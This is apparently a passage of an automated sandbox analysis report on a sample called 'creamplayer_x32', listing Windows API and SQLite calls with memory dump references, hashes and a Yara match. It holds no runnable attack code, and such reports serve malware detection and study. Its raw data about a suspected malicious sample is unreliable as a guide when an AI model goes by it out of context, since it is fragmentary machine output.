                                                                                                    • RegQueryValueExA.KERNEL32(?), ref: 0040D057
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: 393418cfec2289c833a14ba24c505e0ad16217496d0d83ccf94d0a210425da24
                                                                                                    • Instruction ID: 04cb0de4d9de21ebb5c8be7db53efb7bc9d25a7394cb7521ab8b4f49fcf80e29
                                                                                                    • Opcode Fuzzy Hash: 393418cfec2289c833a14ba24c505e0ad16217496d0d83ccf94d0a210425da24
                                                                                                    • Instruction Fuzzy Hash: 5CC00230E0451AEACF115FA0890456EBB72BB84340B21487AD962B21B0DB79961ABA5A
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 4241100979-0
                                                                                                    • Opcode ID: 1307668f9107fcc23f1f7957859d2888dca589b9c1620b5bbf5ee4ab4fa42f6a
                                                                                                    • Instruction ID: 87b4bb1b4ef5a525859fef833b6a268e770200f8356ad07457f62a84397421b8
                                                                                                    • Opcode Fuzzy Hash: 1307668f9107fcc23f1f7957859d2888dca589b9c1620b5bbf5ee4ab4fa42f6a
                                                                                                    • Instruction Fuzzy Hash: 94C09B3544D534D6D5516BD04F4DDEDB16C5F05300B6181BBB143700D1CBFD054A5AAF
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CopyFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 1304948518-0
                                                                                                    • Opcode ID: 378b674e3c1190c0e8b2dd244db47c3ee3f10419fb34aa36e2eaa3bbac0a3bff
                                                                                                    • Instruction ID: adccea78fc68e58af53bcf9c5c641eacc21f61f834cbdd7054748269b0f988af
                                                                                                    • Opcode Fuzzy Hash: 378b674e3c1190c0e8b2dd244db47c3ee3f10419fb34aa36e2eaa3bbac0a3bff
                                                                                                    • Instruction Fuzzy Hash: B6900220249105AEE2140B215E4865526945504B41315443D5447E0060DA38C0496519
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 4cba9ef6f2742578bb1ab532942fb0a2a16bc540f47c5a6fe864ad65f7726e2b
                                                                                                    • Instruction ID: a88dc8968e50e464ca2c8c960636948ab91f2b078dfb4b7c76ec5da4f8d64f8e
                                                                                                    • Opcode Fuzzy Hash: 4cba9ef6f2742578bb1ab532942fb0a2a16bc540f47c5a6fe864ad65f7726e2b
                                                                                                    • Instruction Fuzzy Hash: 339002602445019BD2000A215A187152554660475571144395447E2060DA3480059919
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2422867632-0
                                                                                                    • Opcode ID: 7d46506bad7a1db2616a0b56886a232d532b4501777212f73592975f9aa5807b
                                                                                                    • Instruction ID: ba21a7f1fa838a84e23ee4bf11e23e1f2c38a1bc76e1f81c5cbab30a793903e8
                                                                                                    • Opcode Fuzzy Hash: 7d46506bad7a1db2616a0b56886a232d532b4501777212f73592975f9aa5807b
                                                                                                    • Instruction Fuzzy Hash: 5690027086E402CA57442650602D7247620A9001027A04600F0C7503C0D620DC54C561
                                                                                                    APIs
                                                                                                      • Part of subcall function 02D50610: OpenEventA.KERNEL32(00100002,00000000,00000000,1CD20891), ref: 02D506B0
                                                                                                      • Part of subcall function 02D50610: CloseHandle.KERNEL32(00000000), ref: 02D506C5
                                                                                                      • Part of subcall function 02D50610: ResetEvent.KERNEL32(00000000,1CD20891), ref: 02D506CF
                                                                                                      • Part of subcall function 02D50610: CloseHandle.KERNEL32(00000000,1CD20891), ref: 02D50704
                                                                                                    • TlsSetValue.KERNEL32(00000029,?), ref: 02D511AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEventHandle$OpenResetValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1556185888-0
                                                                                                    • Opcode ID: 2fc989785c1d149f895afc60d138e476e77f36e67e37af2a8b3c3260ad600902
                                                                                                    • Instruction ID: 087900ba5674aaf82d55e3169b4b19ae4a6a6ad9329feae12c0eb3bf0c2090c3
                                                                                                    • Opcode Fuzzy Hash: 2fc989785c1d149f895afc60d138e476e77f36e67e37af2a8b3c3260ad600902
                                                                                                    • Instruction Fuzzy Hash: C8018F71A44254ABDB10CF58EC09F5ABBA8FB09771F10476AF829E3380D775AD048AA0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 25b756e13b7b953d11ee11ed40973e58cad1eba1a31d51ce14ee0e3968ba03af
                                                                                                    • Instruction ID: 73357d582b849376200fcb71df28cb45d3a03518a5f9e8bb9ec57df5c49caa49
                                                                                                    • Opcode Fuzzy Hash: 25b756e13b7b953d11ee11ed40973e58cad1eba1a31d51ce14ee0e3968ba03af
                                                                                                    • Instruction Fuzzy Hash: B7D0121148D7825ED62626245D182D91B906B06370B322667D8B3EA0E7C75D81C7555E
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                                      • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                                    • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                                    • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                                    • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                                    • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                                    • memcmp.MSVCRT ref: 60967D4C
                                                                                                    • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                                    • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                                    • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968002
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                      • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                      • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                                    • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                                    • sqlite3_step.SQLITE3 ref: 60968139
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                                      • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                                      • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                                      • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                                      • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                                    • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                                    • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                                    • sqlite3_free.SQLITE3 ref: 60969102
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID: $d
                                                                                                    • API String ID: 2451604321-2084297493
                                                                                                    • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                                    • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                                    • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                                    • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                                      • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                      • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                      • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                                    • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                                    • String ID: optimize
                                                                                                    • API String ID: 1540667495-3797040228
                                                                                                    • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                                    • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                                    • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                                    • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                                    • sqlite3_free.SQLITE3 ref: 60966183
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                                    • memcmp.MSVCRT ref: 6096639E
                                                                                                      • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                                      • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                                    • String ID: ASC$DESC$x
                                                                                                    • API String ID: 4082667235-1162196452
                                                                                                    • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                    • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                                    • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                    • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096882B
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60968842
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096884D
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968858
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968907
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60968924
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096892F
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 60968947
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 6096895C
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60968975
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609689B0
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                      • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                      • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968A68
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B00
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B2D
                                                                                                    • sqlite3_step.SQLITE3 ref: 60968B38
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968B43
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B9F
                                                                                                    • sqlite3_bind_blob.SQLITE3 ref: 60968BC8
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968BEF
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60968C0C
                                                                                                    • sqlite3_step.SQLITE3 ref: 60968C17
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968C22
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968C2F
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968C3A
                                                                                                      • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
                                                                                                      • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
                                                                                                      • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
                                                                                                      • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
                                                                                                      • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
                                                                                                      • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2526640242-0
                                                                                                    • Opcode ID: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                                                                    • Instruction ID: ecb2fadc30329ad4410b738d56806f6ecd0ac298638076f7c65242d8805d2ed1
                                                                                                    • Opcode Fuzzy Hash: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                                                                    • Instruction Fuzzy Hash: A0D1C2B4A153189FDB14DF68C884B8EBBF2BFA9304F118599E888A7344E774D985CF41
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                                    • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                                    • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                    • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                                    • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                                    • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                                    • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                                    • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                                    • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                                    • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                                    • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                                      • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                                    • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                                    • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                                    • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
